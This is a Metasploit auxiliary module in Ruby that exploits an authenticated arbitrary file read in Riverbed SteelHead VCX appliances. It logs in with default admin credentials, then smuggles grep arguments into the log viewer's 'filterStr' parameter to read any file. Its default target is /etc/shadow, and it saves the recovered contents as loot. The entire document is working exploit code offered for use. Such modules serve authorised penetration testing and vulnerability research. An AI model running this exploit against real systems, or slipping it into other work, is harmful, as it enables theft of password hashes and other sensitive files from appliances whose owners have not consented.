Riverbed SteelHead VCX File Read

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
  
def initialize  
super(  
'Name' => 'Riverbed SteelHead VCX File Read',  
'Description' => %q{  
This module exploits an authenticated arbitrary file read in the log module's filter engine.  
SteelHead VCX (VCX255U) version 9.6.0a was confirmed as vulnerable.  
},  
'References' =>  
[  
['EDB', '42101']  
],  
'Author' =>  
[  
'Gregory DRAPERI <gregory.draper_at_gmail.com>', # Exploit  
'h00die' # Module  
],  
'DisclosureDate' => 'Jun 01 2017',  
'License' => MSF_LICENSE  
)  
  
register_options(  
[  
OptString.new('FILE', [ true, 'Remote file to view', '/etc/shadow']),  
OptString.new('TARGETURI', [true, 'Vulnerable URI path', '/']),  
OptString.new('USERNAME', [true, 'Username', 'admin']),  
OptString.new('PASSWORD', [true, 'Password', 'password']),  
])  
end  
  
def run_host(ip)  
# pull our csrf  
res = send_request_cgi({  
'uri' => normalize_uri(datastore['TARGETURI'], 'login'),  
'method' => 'GET',  
'vars_get' => {  
'next' => '/'  
}  
}, 25)  
  
unless res  
print_error("#{full_uri} - Connection timed out")  
return  
end  
  
cookie = res.get_cookies  
csrf = cookie.scan(/csrftoken=(\w+);/).flatten[0]  
vprint_status("CSRF Token: #{csrf}")  
  
# authenticate  
res = send_request_cgi({  
'uri' => normalize_uri(datastore['TARGETURI'], 'login'),  
'method' => 'POST',  
'cookie' => cookie,  
'vars_post' => {  
'csrfmiddlewaretoken' => csrf,  
'_fields' => JSON.generate({  
'username' => datastore['USERNAME'],  
'password' => datastore['PASSWORD'],  
'legalAccepted' => 'N/A',  
'userAgent' => ''  
})  
}  
}, 25)  
  
unless res  
print_error("#{full_uri} - Connection timed out")  
return  
end  
  
if res.code == 400  
print_error('Failed Authentication')  
return  
elsif res.code == 200  
vprint_good('Authenticated Successfully')  
cookie = res.get_cookies  
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'], proof: cookie)  
end  
  
# pull the file  
res = send_request_cgi({  
'uri' => normalize_uri(datastore['TARGETURI'], 'modules/common/logs'),  
'method' => 'GET',  
'cookie' => cookie,  
'vars_get' => {  
'filterStr' => "msg:-e .* #{datastore['FILE']}"  
}  
}, 25)  
  
unless res  
print_error("#{full_uri} - Connection timed out")  
return  
end  
  
if res && res.body  
result = res.get_json_document  
unless result.has_key?('web3.model')  
print_error('Invalid JSON returned')  
return  
end  
reconstructed_file = []  
# so the format is super icky here. It makes a hash table for each row in the file. then the 'msg' field starts with  
# the file name. It also, by default, includes other files, so we need to check we're on the right file.  
result['web3.model']['messages']['rows'].each do |row|  
if row['msg'].start_with?(datastore['FILE'])  
reconstructed_file << row['msg'].gsub("#{datastore['FILE']}:",'').strip  
end  
end  
if reconstructed_file.any?  
reconstructed_file = reconstructed_file.join("\n")  
vprint_good("File Contents:\n#{reconstructed_file}")  
stored_path = store_loot('host.files', 'text/plain', rhost, reconstructed_file, datastore['FILE'])  
print_good("Stored #{datastore['FILE']} to #{stored_path}")  
else  
print_error("File not found or empty file: #{datastore['FILE']}")  
end  
end  
end  
end  
`